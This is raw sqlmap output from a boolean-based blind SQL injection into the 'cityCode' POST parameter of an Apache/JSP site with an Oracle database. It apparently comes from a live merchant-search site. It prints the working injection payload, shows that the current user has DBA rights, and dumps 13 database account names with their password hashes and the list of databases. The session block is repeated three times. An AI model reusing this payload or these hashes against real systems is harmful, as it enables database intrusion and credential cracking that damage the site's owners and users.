--- Parameter: cityCode (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: homeinputusername=%E6%90%9C%E7%B4%A2%E5%95%86%E6%88%B7%E5%90%8D,%E5%9C%B0%E5%9D%80,%E5%88%86%E7%B1%BB%E7%AD%89&codeKey=ljxD&selectkey=&curPage=1&cityCode=0021' AND 9624=9624 AND 'HHvX'='HHvX --- web application technology: Apache, JSP back-end DBMS: Oracle current user: 'FPS' current user is DBA: True database management system users [13]: [*] ALGORITHM [*] DBSNMP [*] FPS [*] OUTLN [*] PERFSTAT [*] PLATFORM [*] POINT [*] STRMADMIN [*] SYS [*] SYSTEM [*] WMSYS [*] ZABBIX [*] ZCT database management system users password hashes: [*] ALGORITHM [1]: password hash: 695B6259730A64FB [*] DBSNMP [1]: password hash: E066D214D5421CCC [*] FPS [1]: password hash: DC56B518968A5AE9 [*] OUTLN [1]: password hash: 4A3BA55E08595C81 [*] PERFSTAT [1]: password hash: 626A176E28C6CE55 [*] PLATFORM [1]: password hash: F8BC038657845D39 [*] POINT [1]: password hash: 7817F30648C47299 [*] STRMADMIN [1]: password hash: F7737B6F005CD1A1 [*] SYS [1]: password hash: BFE77DD10B99747E [*] SYSTEM [1]: password hash: 420A4FCE8EDB1662 [*] WMSYS [1]: password hash: 7C9BA362F8314299 [*] ZABBIX [1]: password hash: 701322E64241BE07 [*] ZCT [1]: password hash: 1E67C73BCC1D7FE7 sqlmap resumed the following injection point(s) from stored session: --- Parameter: cityCode (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: homeinputusername=%E6%90%9C%E7%B4%A2%E5%95%86%E6%88%B7%E5%90%8D,%E5%9C%B0%E5%9D%80,%E5%88%86%E7%B1%BB%E7%AD%89&codeKey=ljxD&selectkey=&curPage=1&cityCode=0021' AND 9624=9624 AND 'HHvX'='HHvX --- web application technology: Apache, JSP back-end DBMS: Oracle sqlmap resumed the following injection point(s) from stored session: --- Parameter: cityCode (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: homeinputusername=%E6%90%9C%E7%B4%A2%E5%95%86%E6%88%B7%E5%90%8D,%E5%9C%B0%E5%9D%80,%E5%88%86%E7%B1%BB%E7%AD%89&codeKey=ljxD&selectkey=&curPage=1&cityCode=0021' AND 9624=9624 AND 'HHvX'='HHvX --- web application technology: Apache, JSP back-end DBMS: Oracle available databases [10]: [*] ALGORITHM [*] FPS [*] OUTLN [*] PERFSTAT [*] PLATFORM [*] POINT [*] STRMADMIN [*] SYS [*] SYSTEM [*] WMSYS